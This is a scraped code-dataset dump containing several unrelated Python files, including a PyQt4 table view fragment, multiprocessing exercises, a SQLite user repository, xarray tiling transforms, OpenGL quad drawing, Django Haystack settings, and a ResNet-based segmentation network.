self.gui['auto_refresh'].setStyleSheet("")
else:
self.gui['auto_refresh'].setStyleSheet("background:"+COLORS.green)
return
def Update(self):
# stop dynamic filtering if no children
# because of filter issue and "has stopped working" error
#self.proxy_model.setDynamicSortFilter(self.proxy_model.hasChildren())
#print "U1"
ret = DfTable.Update(self)
#print "U2"
#update gui
self.UpdateGui()
#update active numbers
self.Update_ActiveNumbers()
# # after F5 this would edit the number in the first row
# myindex = self.proxy_model.index(0,1)
# print myindex, type(myindex), myindex.column(), myindex.row()
# if(myindex.isValid() == True):
# self.gui['view'].edit(myindex)
return ret
#edit previous cell
def AutoEdit_MOVEDTO_dfTABLE(self, myindex):
myindex = self.proxy_model.mapFromSource(myindex)
if myindex.row() > 0:
myindex = self.proxy_model.index(myindex.row()-1, myindex.column())
if(myindex.isValid() == True):
self.gui['view'].edit(myindex)
#create list of columns to hide
def CollumnsToHide(self):
ai = dstore.Get("additional_info")
columns = []
for k,v in ai.items():
#dict
if ("checked" in v):
if(v['checked'] == 0):
columns.append(k)
continue
#list of dict
c = 0
for item in v:
c = c+1
if(item['checked'] == 0):
columns.append(k+""+str(c))
return columns
if __name__ == "__main__":
import sys
from PyQt4 import QtGui
from Ui_App import Ui_MainWindow
from ewitis.gui.Ui import appWindow
from ewitis.gui.Ui import Ui
from ewitis.gui.UiAccesories import uiAccesories
print "START"
app = QtGui.QApplication(sys.argv)
appWindow.Init()
uiAccesories.Init()
model = DfModelTimes()
proxymodel = DfProxymodelTimes()
dfTableTimes = DfTableTimes()
dfTableTimes.Init()
dfTableTimes.Update()
appWindow.show()
sys.exit(app.exec_())
tableTimes = DfTableTimes()
| [
"[email protected]"
]
| |
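One idiom in `sExportDirect` above deserves a standalone note: `columns.difference` selects only the user columns that the times table does not already have, so the left merge cannot produce `_x`/`_y` suffix collisions. A minimal sketch with made-up column names:

```python
import pandas as pd

times = pd.DataFrame({"nr": [1, 2], "time1": [10.5, 11.2]})
users = pd.DataFrame({"nr": [1, 2], "time1": [0.0, 0.0], "name": ["A", "B"]})

# keep only the user columns absent from times, plus the join key
cols_to_use = list(users.columns.difference(times.columns)) + ["nr"]
merged = pd.merge(times, users[cols_to_use], how="left", on="nr")
print(list(merged.columns))  # ['nr', 'time1', 'name'] -- no suffixed duplicates
```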
6e8ee652e5e7b105b697cf9fdec23a5e025e1dee | 4a9dada02c749e9e5277fe1e35357d7b2b28ad5c | /郝嘉良2018013383/操作系统实验/作业3.py | 44b2f84b1cc0ec63e1941c65a01a64ac57e05c53 | []
| no_license | wanghan79/2020_Option_System | 631cc80f52829390a128a86677de527472470348 | f37b870614edf7d85320da197d932df2f25a5720 | refs/heads/master | 2021-01-09T13:10:05.630685 | 2020-07-10T03:30:39 | 2020-07-10T03:30:39 | 242,312,271 | 13 | 9 | null | 2020-07-04T16:13:11 | 2020-02-22T09:12:56 | Python | UTF-8 | Python | false | false | 4,488 | py | import multiprocessing
import threading
import logging
import time
# 1. Basic multiprocessing demo
def hello(i):
    print('hello, im', i)

if __name__ == '__main__':
    for i in range(10):
        p = multiprocessing.Process(target=hello, args=(i,))
        p.start()
# 2. Giving processes custom names
logging.basicConfig(
    level=logging.DEBUG,
    format="(%(threadName)-10s) %(message)s",
)

def worker():
    name = multiprocessing.current_process().name
    logging.debug('%s starting' % name)
    time.sleep(3)
    logging.debug('%s exiting' % name)

def my_service():
    name = multiprocessing.current_process().name
    logging.debug('%s starting' % name)
    time.sleep(3)
    logging.debug('%s exiting' % name)

if __name__ == '__main__':
    service = multiprocessing.Process(
        name='my_service',
        target=my_service,
    )
    worker_1 = multiprocessing.Process(
        name='worker_1',
        target=worker,
    )
    worker_2 = multiprocessing.Process(
        target=worker,
    )
    service.start()
    worker_1.start()
    worker_2.start()
# 3. Daemon process, without waiting for it to finish
logging.basicConfig(
    level=logging.DEBUG,
    format='(%(threadName)-10s) %(message)s',
)

def daemon():
    p = multiprocessing.current_process()
    logging.debug('%s %s starting' % (p.name, p.pid))
    time.sleep(2)
    logging.debug('%s %s exiting' % (p.name, p.pid))

def no_daemon():
    p = multiprocessing.current_process()
    logging.debug('%s %s starting' % (p.name, p.pid))
    logging.debug('%s %s exiting' % (p.name, p.pid))

if __name__ == '__main__':
    daemon_obj = multiprocessing.Process(
        target=daemon,
        name='daemon'
    )
    daemon_obj.daemon = True
    no_daemon_obj = multiprocessing.Process(
        target=no_daemon,
        name='no_daemon'
    )
    no_daemon_obj.daemon = False
    daemon_obj.start()
    time.sleep(1)
    no_daemon_obj.start()
# 4. Daemon process with a join() timeout
logging.basicConfig(
    level=logging.DEBUG,
    format='(%(threadName)-10s) %(message)s',
)

def daemon():
    p = multiprocessing.current_process()
    logging.debug('%s %s starting' % (p.name, p.pid))
    time.sleep(2)
    logging.debug('%s %s exiting' % (p.name, p.pid))

def no_daemon():
    p = multiprocessing.current_process()
    logging.debug('%s %s starting' % (p.name, p.pid))
    logging.debug('%s %s exiting' % (p.name, p.pid))

if __name__ == '__main__':
    daemon_obj = multiprocessing.Process(
        target=daemon,
        name='daemon'
    )
    daemon_obj.daemon = True
    no_daemon_obj = multiprocessing.Process(
        target=no_daemon,
        name='no_daemon'
    )
    no_daemon_obj.daemon = False
    daemon_obj.start()
    time.sleep(1)
    no_daemon_obj.start()
    daemon_obj.join(1)
    logging.debug('daemon_obj.is_alive():%s' % daemon_obj.is_alive())
    no_daemon_obj.join()
# 5. Terminating a process. Note: after terminate(), join() the process
#    to make sure the termination has actually completed.
logging.basicConfig(
    level=logging.DEBUG,
    format='(%(threadName)-10s) %(message)s',
)

def slow_worker():
    print('work started')
    time.sleep(0.1)
    print('work finished')

if __name__ == '__main__':
    p = multiprocessing.Process(
        target=slow_worker
    )
    logging.debug('state before start: %s' % p.is_alive())
    p.start()
    logging.debug('state while running: %s' % p.is_alive())
    p.terminate()
    logging.debug('state right after terminate(): %s' % p.is_alive())
    p.join()
    logging.debug('state after join(), all done: %s' % p.is_alive())
# 6. Process exit status codes
def exit_error():
    sys.exit(1)

def exit_ok():
    return

def return_value():
    return 1

def raises():
    raise RuntimeError('runtime error')

def terminated():
    time.sleep(3)

if __name__ == '__main__':
    jobs = []
    funcs = [
        exit_error,
        exit_ok,
        return_value,
        raises,
        terminated,
    ]
    for func in funcs:
        print('running process for function %s' % func.__name__)
        j = multiprocessing.Process(
            target=func,
            name=func.__name__
        )
        jobs.append(j)
        j.start()
    # terminate only the last job (the sleeping 'terminated' process)
    jobs[-1].terminate()
    for j in jobs:
        j.join()
        print('{:>15}.exitcode={}'.format(j.name, j.exitcode)) | [
"[email protected]"
]
| |
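A detail worth adding to section 6: a process killed via `terminate()` reports a negative `exitcode`, the negated signal number (`-15` for SIGTERM on Unix). A minimal sketch, assuming a POSIX platform:

```python
import multiprocessing
import time

def sleeper():
    time.sleep(10)

if __name__ == '__main__':
    p = multiprocessing.Process(target=sleeper)
    p.start()
    p.terminate()
    p.join()  # make sure termination has completed before reading exitcode
    print(p.exitcode)  # -15 on Unix: negative means "killed by signal"
```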
5e5a54d0191082f22946db5b5b2325b7c67c51d2 | 6e86e685d0469f131446c809c1478c8faf27a382 | /jhmanager/repo/users.py | 582b475baddd69a97050511ed92ca6afd4986e97 | []
| no_license | CardinisCode/jobhuntmanager | 551091e35ab30704c42191f3c35b2e91a5f7a704 | 23be1e10bdaaa9d203090fbbd9a44fe0472f8b18 | refs/heads/master | 2023-04-26T06:47:44.726364 | 2021-05-25T13:04:34 | 2021-05-25T13:04:34 | 317,517,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | from jhmanager.repo.database import SqlDatabase
from datetime import date, time
from flask import flash
import sqlite3
class User:
    def __init__(self, db_fields):
        self.user_id = db_fields[0]
        self.username = db_fields[1]
        self.hash = db_fields[2]
        self.email = db_fields[3]
        self.date = db_fields[4]

class UserRepository:
    def __init__(self, db):
        self.db = db

    def createUser(self, fields):
        cursor = self.db.cursor()
        command = """
        INSERT INTO users
        (username, hash, email, date)
        VALUES (?, ?, ?, ?)
        """
        result = cursor.execute(command, tuple(fields.values()))
        self.db.commit()
        return result.lastrowid

    def getUserByID(self, user_id):
        cursor = self.db.cursor()
        result = cursor.execute("SELECT * FROM users WHERE user_id=?", (user_id,))
        self.db.commit()
        user_result = User(result.fetchone())
        return user_result

    def getUserByUsername(self, username):
        cursor = self.db.cursor()
        result = cursor.execute("SELECT * FROM users WHERE username=?", (username,))
        self.db.commit()
        return result.fetchone()

    def getUserByEmail(self, email):
        cursor = self.db.cursor()
        result = cursor.execute("SELECT * FROM users WHERE email=?", (email,))
        self.db.commit()
        return result.fetchone()

    def updateUserEmailByID(self, fields):
        cursor = self.db.cursor()
        command = """
        UPDATE users
        SET email = ?
        WHERE user_id = ?
        """
        cursor.execute(command, tuple(fields.values()))
        self.db.commit()

    def updateUserHashByID(self, fields):
        cursor = self.db.cursor()
        command = """
        UPDATE users
        SET hash = ?
        WHERE user_id = ?
        """
        cursor.execute(command, tuple(fields.values()))
        self.db.commit()

    def deleteUserByID(self, user_id):
        message = ""
        try:
            cursor = self.db.cursor()
            # parameterized query instead of string formatting, to avoid SQL injection
            cursor.execute("DELETE FROM users WHERE user_id = ?", (user_id,))
            self.db.commit()
            message = "User details deleted successfully."
        except sqlite3.Error as error:
            message = "User details failed to delete. " + str(error)
        finally:
            return message | [
"[email protected]"
]
| |
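The repository leans on sqlite3's `?` placeholders for escaping. A sketch of wiring it up against an in-memory database; the `CREATE TABLE` statement is inferred from the `User` fields, not taken from the project's real schema:

```python
import sqlite3
# from jhmanager.repo.users import UserRepository  # assuming the module above is importable

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
           "username TEXT, hash TEXT, email TEXT, date TEXT)")

repo = UserRepository(db)
# createUser relies on dict insertion order matching the INSERT columns (Python 3.7+)
user_id = repo.createUser({
    "username": "jane",
    "hash": "pbkdf2:sha256:...",   # placeholder password hash
    "email": "jane@example.com",
    "date": "2021-05-25",
})
print(repo.getUserByID(user_id).username)  # jane
print(repo.deleteUserByID(user_id))        # User details deleted successfully.
```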
745e496a4d5f14874c52650c007e52a0330e2f34 | c0613b519124979d1de12614a9a7a745f9c9a66f | /xarray_leaflet/transform.py | 8d1eb0ac19ca7d3304887c784e7dc8a224b59fd8 | [
"MIT"
]
| permissive | netgodz/xarray_leaflet | 1cccb67251dd81817c6893f47a55989846d03062 | d4c22781243e8e4900cd43a4479cfc932f68bdcf | refs/heads/master | 2023-07-16T15:15:47.090465 | 2021-08-06T20:16:46 | 2021-08-07T06:20:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import warnings
import numpy as np
import xarray as xr
def passthrough(array, *args, **kwargs):
    return array

def normalize(array, *args, **kwargs):
    vmin = np.min(array).values
    vmax = np.max(array).values
    array = (array - vmin) / (vmax - vmin)
    return array

def coarsen(agg_func=xr.core.rolling.DataArrayCoarsen.mean):
    def _(array, *args, **kwargs):
        tile_width = kwargs['tile_width']
        tile_height = kwargs['tile_height']
        if len(array.shape) > 2:
            # it's an RGB array
            array_2d = array.isel(rgb=0)
        else:
            array_2d = array
        ny, nx = array_2d.shape
        wx = nx // (tile_width * 2)
        wy = ny // (tile_height * 2)
        dim = {}
        if wx > 1:
            dim['x'] = wx
        if wy > 1:
            dim['y'] = wy
        array = array.coarsen(**dim, boundary='pad')
        # ignore "mean of empty slice" warning in np.nanmean
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=RuntimeWarning)
            array = agg_func(array)
        return array
    return _
| [
"[email protected]"
]
| |
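A rough illustration of the `coarsen` transform above: with 256-pixel tiles and a 1024x1024 array, the window is `1024 // (256 * 2) = 2` per axis, so the output is halved in each dimension. The import line is an assumption about the package layout:

```python
import numpy as np
import xarray as xr
# from xarray_leaflet.transform import coarsen  # assuming the module above

data = xr.DataArray(np.random.rand(1024, 1024), dims=("y", "x"))
transform = coarsen()  # defaults to a mean aggregation
smaller = transform(data, tile_width=256, tile_height=256)
print(smaller.shape)   # (512, 512)
```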
171345562deab9b5d2ed7d77b42ef9ca9b3a89fe | 9ce3385fb9829b70f191ea9478ebfe2dd4971c80 | /render/imdraw/quad.py | 896bbb74707bf37dfa00d1980753279e53e698b4 | []
| no_license | zalavariandris/editor | f3ffce9ae2bbd70fd9e9ce1b9ce8fc7bb23468a3 | 35b8941af12da58bb190967c28a78c91d5bb43dc | refs/heads/master | 2022-12-18T10:53:24.274321 | 2020-10-01T16:58:17 | 2020-10-01T16:58:17 | 283,721,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | from OpenGL.GL import *
import numpy as np
from .helpers import buffer_offset
import logging
import functools
@functools.lru_cache(maxsize=128)
def quad_geo():
    positions = np.array(
        [(-1.0, +1.0, 0.0),
         (-1.0, -1.0, 0.0),
         (+1.0, +1.0, 0.0),
         (+1.0, -1.0, 0.0)],
        dtype=np.float32
    )
    uvs = np.array(
        [(0.0, 1.0),
         (0.0, 0.0),
         (1.0, 1.0),
         (1.0, 0.0)],
        dtype=np.float32
    )
    logging.debug("create quad geo")
    return positions, uvs

@functools.lru_cache(maxsize=128)
def create_buffer(program):
    positions, uvs = quad_geo()
    # setup VAO
    vao = glGenVertexArrays(1)
    pos_vbo, uv_vbo = glGenBuffers(2)  # FIXME: use single vbo for positions and vertices
    glBindVertexArray(vao)
    position_location = glGetAttribLocation(program, 'position')
    if position_location >= 0:
        glBindBuffer(GL_ARRAY_BUFFER, pos_vbo)
        glBufferData(GL_ARRAY_BUFFER, positions.nbytes, positions, GL_STATIC_DRAW)
        glVertexAttribPointer(position_location, 3, GL_FLOAT, False, 0, buffer_offset(0))
        glEnableVertexAttribArray(position_location)
        glBindBuffer(GL_ARRAY_BUFFER, 0)
    else:
        logging.warning("no 'position' attribute")
    uv_location = glGetAttribLocation(program, 'uv')
    if uv_location >= 0:
        glBindBuffer(GL_ARRAY_BUFFER, uv_vbo)
        glBufferData(GL_ARRAY_BUFFER, uvs.nbytes, uvs, GL_STATIC_DRAW)
        glVertexAttribPointer(uv_location, 2, GL_FLOAT, False, 0, buffer_offset(0))
        glEnableVertexAttribArray(uv_location)
        glBindBuffer(GL_ARRAY_BUFFER, 0)
    else:
        logging.warning("no 'uv' attribute")
    glBindVertexArray(0)
    logging.debug("create quad buffer: {}".format(vao))
    return vao

def quad(program):
    vao = create_buffer(program)
    # draw
    glBindVertexArray(vao)
    glDrawArrays(GL_TRIANGLE_STRIP, 0, 4)
    glBindVertexArray(0)
| [
"[email protected]"
]
| |
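Usage is intentionally simple: `create_buffer` is memoized per shader program by `lru_cache`, so the VAO is built once and every later `quad(program)` call just binds and draws. A sketch of a draw-loop call site (obtaining a valid GL context and a linked `program` is left to the surrounding renderer):

```python
from OpenGL.GL import glUseProgram
# from render.imdraw.quad import quad  # the module shown above

def draw_fullscreen_quad(program):
    glUseProgram(program)   # program must be a linked GLSL program with 'position'/'uv'
    quad(program)           # first call builds and caches the VAO, later calls reuse it
    glUseProgram(0)
```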
0e1aab0283ba37b62180201b79ac72c433de0f15 | 165abb376cc4ead31e9b4d49c1a0f7c917f827ae | /ixc_django_docker/settings/haystack.py | 4dfae42c1548f375d65da4f19fb6a243db1fa4c2 | []
| no_license | ixc/ixc-django-docker | 8a04d0efa1d2ac0610b7c55facc6a210b6b6584d | 2f4302d8dd52ff0d1ad7a6f5973f70bcd808f283 | refs/heads/master | 2023-08-23T10:54:56.399455 | 2023-08-22T03:38:18 | 2023-08-22T03:38:18 | 74,635,795 | 6 | 1 | null | 2021-12-09T05:44:39 | 2016-11-24T03:45:17 | Shell | UTF-8 | Python | false | false | 476 | py | # Get host and port from the environment.
ELASTICSEARCH_ADDRESS = os.environ.get(
    'ELASTICSEARCH_ADDRESS', 'localhost:9200')

HAYSTACK_CONNECTIONS = {
    'default': {
        'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',
        'INDEX_NAME': 'haystack-%s' % PROJECT_SLUG,
        'URL': 'http://%s/' % ELASTICSEARCH_ADDRESS,
    },
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.BaseSignalProcessor'
INSTALLED_APPS += ('haystack', )
| [
"[email protected]"
]
| |
a5db49511995b5c0c369a2d5a308df36b8a16749 | 6e10140ec08e7581f31154a5d569cfc7fd682e04 | /ptsemseg/models/MV2_base_0.py | 1a71d201c06869955e25bb52b8a0d0f0f045bdff | []
| no_license | Spritea/pytorch-semseg-dvs-two-titan | 578d6f8518e7d50e03d7c8ac3695df2d892de255 | c481ac7b907bed38e3e08248552f8e69d8327c6d | refs/heads/master | 2021-10-25T08:33:28.658918 | 2019-04-03T02:16:30 | 2019-04-03T02:16:30 | 178,819,051 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,530 | py | import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import torch
from torch.nn import functional as F
models_urls = {
'101_voc': 'https://cloudstor.aarnet.edu.au/plus/s/Owmttk9bdPROwc6/download',
'18_imagenet': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'34_imagenet': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'50_imagenet': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'152_imagenet': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'101_imagenet': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
}
def maybe_download(model_name, model_url, model_dir=None, map_location=None):
import os, sys
from six.moves import urllib
if model_dir is None:
torch_home = os.path.expanduser(os.getenv('TORCH_HOME', '~/.torch'))
model_dir = os.getenv('TORCH_MODEL_ZOO', os.path.join(torch_home, 'models'))
if not os.path.exists(model_dir):
os.makedirs(model_dir)
filename = '{}.pth.tar'.format(model_name)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
url = model_url
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
urllib.request.urlretrieve(url, cached_file)
return torch.load(cached_file, map_location=map_location)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
def conv3x3_bn(in_channel, out_channel):
return nn.Sequential(nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=1, padding=1, bias=False),
nn.ReLU(inplace=True))
class MultiResolutionFuse(nn.Module):
def __init__(self, in_size, out_size):
super(MultiResolutionFuse, self).__init__()
self.in_size=in_size
self.out_size=out_size
self.conv = nn.Conv2d(in_size, out_size, kernel_size=1, stride=1, bias=False)
def forward(self, input_low, input_high):
high_size = input_high.size()[2:]
# low channel usually > high channel
if self.in_size != self.out_size:
input_low = self.conv(input_low)
upsample_low = F.upsample(input_low, high_size, mode='bilinear')
cat = torch.cat([upsample_low, input_high], dim=1)
return cat
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = conv1x1(inplanes, planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, planes * self.expansion)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class RefineBlock(nn.Module):
def __init__(self, in_channel):
super(RefineBlock, self).__init__()
self.c1 = nn.Conv2d(in_channel, 512,kernel_size=1, stride=1, padding=0, bias=False)
self.c3_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn = nn.BatchNorm2d(512)
self.relu = nn.ReLU(inplace=True)
self.c3_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
def forward(self, x):
x1 = self.c1(x)
x = self.c3_1(x1)
x = self.bn(x)
x = self.relu(x)
x = self.c3_2(x)
out = x1 + x
return out
# only refine block, no FPA
class MV2_base_0_ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
super(MV2_base_0_ResNet, self).__init__()
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.rb1_1 = RefineBlock(256)
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.rb2_1 = RefineBlock(512)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.rb3_1 = RefineBlock(1024)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.rb4_1 = RefineBlock(2048)
# self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes)
# only for >=res50
# self.fpa=FPA(2048,512)
# self.fpa = FPA(512, 512)
# self.rb4_2 = RefineBlock(512 * 4)
self.fuse43 = MultiResolutionFuse(512, 512)
# self.post_proc43 = conv3x3_bn(512*2,512)
self.rb3_2 = RefineBlock(512 * 2)
self.fuse32 = MultiResolutionFuse(512, 512)
self.rb2_2 = RefineBlock(512 * 2)
# self.post_proc32 = conv3x3_bn(512)
self.fuse21 = MultiResolutionFuse(512, 512)
self.rb1_2 = RefineBlock(512 * 2)
# self.post_proc21 = conv3x3_bn(512)
self.class_conv = nn.Conv2d(512, num_classes, kernel_size=3, stride=1,
padding=1, bias=True)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
ori_size = x.size()[2:]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
l1 = self.layer1(x)
l2 = self.layer2(l1)
l3 = self.layer3(l2)
l4 = self.layer4(l3)
l1 = self.rb1_1(l1)
l2 = self.rb2_1(l2)
l3 = self.rb3_1(l3)
l4 = self.rb4_1(l4)
# l4 = self.fpa(l4)
# l4=self.rb4_2(l4)
x_fuse43 = self.fuse43(l4, l3)
x_fuse43=self.rb3_2(x_fuse43)
x_fuse32 = self.fuse32(x_fuse43, l2)
x_fuse32=self.rb2_2(x_fuse32)
x_fuse21 = self.fuse21(x_fuse32, l1)
x_fuse21=self.rb1_2(x_fuse21)
x = self.class_conv(x_fuse21)
x = F.upsample(x, ori_size, mode='bilinear')
return x
def MV2_base_0_ResNet18(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(BasicBlock, [2, 2, 2, 2], **kwargs, num_classes=num_classes)
if pretrained:
key = '18_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet34(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-34 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(BasicBlock, [3, 4, 6, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '34_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet50(num_classes, pretrained=True, **kwargs):
"""Constructs a MV1_ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 4, 6, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '50_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
print("load imagenet res50")
return model
def MV2_base_0_ResNet101(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 4, 23, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '101_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet152(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 8, 36, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '152_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
| [
"[email protected]"
]
| |
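A quick shape check of the segmentation head, as a hedged sketch; the class count and input size are arbitrary, and `pretrained=False` skips the ImageNet download:

```python
import torch
# from ptsemseg.models.MV2_base_0 import MV2_base_0_ResNet50  # assuming this module path

model = MV2_base_0_ResNet50(num_classes=6, pretrained=False)
model.eval()
with torch.no_grad():
    x = torch.randn(1, 3, 256, 256)   # NCHW input
    y = model(x)
print(y.shape)  # torch.Size([1, 6, 256, 256]) -- upsampled back to the input size
```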
516db0555bf68f2992a2c77c28f9bdf347708d9d | a4e6b080d17611853374577aaecb0367366b39b5 | /glycresoft_sqlalchemy/utils/data_files.py | 9692dd3d26e4eda167b518a3793d1736dbfd05e7 | []
| no_license | mobiusklein/glycresoft_sqlalchemy | 6235b1ea2c8da9ef6b2e725a60f0b6a925f1689d | e0edf12a8d6243cc2438a6236aa0564a28f92a8a | refs/heads/master | 2020-04-06T05:38:35.849225 | 2016-11-21T03:25:26 | 2016-11-21T03:25:26 | 37,537,754 | 0 | 2 | null | 2016-11-21T03:25:27 | 2015-06-16T15:10:45 | Python | UTF-8 | Python | false | false | 2,525 | py | import os
from functools import partial
from .vendor import sqlitedict, appdir
from glycresoft_sqlalchemy.report import colors
from glycresoft_sqlalchemy.structure.data import unimod
dirs = appdir.AppDirs("GlycReSoft", "Zaia Lab", "1.0", roaming=True)
pjoin = os.path.join
data_directory = dirs.user_data_dir
cache_directory = dirs.user_cache_dir
if not os.path.exists(data_directory):
    os.makedirs(data_directory)

try:
    # WindowsError only exists on Windows; fall back to OSError elsewhere
    invalidation_errors = (OSError, WindowsError)
except NameError:
    invalidation_errors = (OSError,)

class ResourcePath(str):
    valid = True

    def invalidate(self):
        self.valid = False

    def validate(self):
        if not self.valid:
            if self.exists:
                self.remove()

    def remove(self):
        try:
            os.remove(self)
        except invalidation_errors:
            pass

    @property
    def exists(self):
        return os.path.exists(self)

class Resource(object):
    def __init__(self, name, path, **kwargs):
        self.name = name
        self.path = ResourcePath(path)
        self.held = kwargs.get('held', False)
        self.owners = kwargs.get('owners', set())
        self.ready = kwargs.get("ready", False)

    def __str__(self):
        return self.path

    def __repr__(self):
        return "Resource(name=%r, path=%r)" % (self.name, self.path)

    def acquired(self, owner):
        if owner not in self.owners:
            self.owners.add(owner)

    def release(self, owner):
        if owner not in self.owners:
            raise ValueError("%r is not a valid owner" % owner)
        self.owners.remove(owner)
        if len(self.owners) == 0:
            self.held = False

display_store = ResourcePath(pjoin(data_directory, "display_store.db"))
unimod_store = ResourcePath(pjoin(data_directory, "unimod.db"))
glycomedb_store = ResourcePath(pjoin(data_directory, "glycome-db.db"))
glycomedb_download_cache = ResourcePath(pjoin(data_directory, "glycome-db-download-cache"))
taxonomylite_store = ResourcePath(pjoin(data_directory, "taxonomylite.db"))

def make_absolute_sqlite_sqlalchemy_uri(path):
    return "sqlite:///%s" % path

def configure_color_store():
    '''Use a disk-based data-store to persist color assignments'''
    color_map = colors._color_mapper.color_name_map
    cmap = sqlitedict.open(display_store, "colors", autocommit=True)
    cmap.update(color_map)
    colors._color_mapper.color_name_map = cmap

configure_color_store()

unimod.load = partial(unimod.load, make_absolute_sqlite_sqlalchemy_uri(unimod_store))
| [
"[email protected]"
]
| |
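The `Resource` bookkeeping above works by tracking owners; the last `release` clears `held`. A small sketch (the path is hypothetical):

```python
# from glycresoft_sqlalchemy.utils.data_files import Resource  # assuming the module above

res = Resource("unimod", "/tmp/unimod.db")  # hypothetical path
res.acquired("indexer")
res.acquired("searcher")
res.release("indexer")
print(res.owners)         # {'searcher'}
res.release("searcher")   # last owner released -> held is cleared
print(res.held)           # False
# res.release("searcher") would now raise ValueError: not a valid owner
```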
911c01224778fd2b7f5f5f645eb0716acbf69539 | c3d0a0b6336a3ff73724fe1615eb1809dbdaaed8 | /Extra Lockdown Tasks/Logical_Operators.py | 6b1193d9bf1da442ed977288478970802a3c804f | []
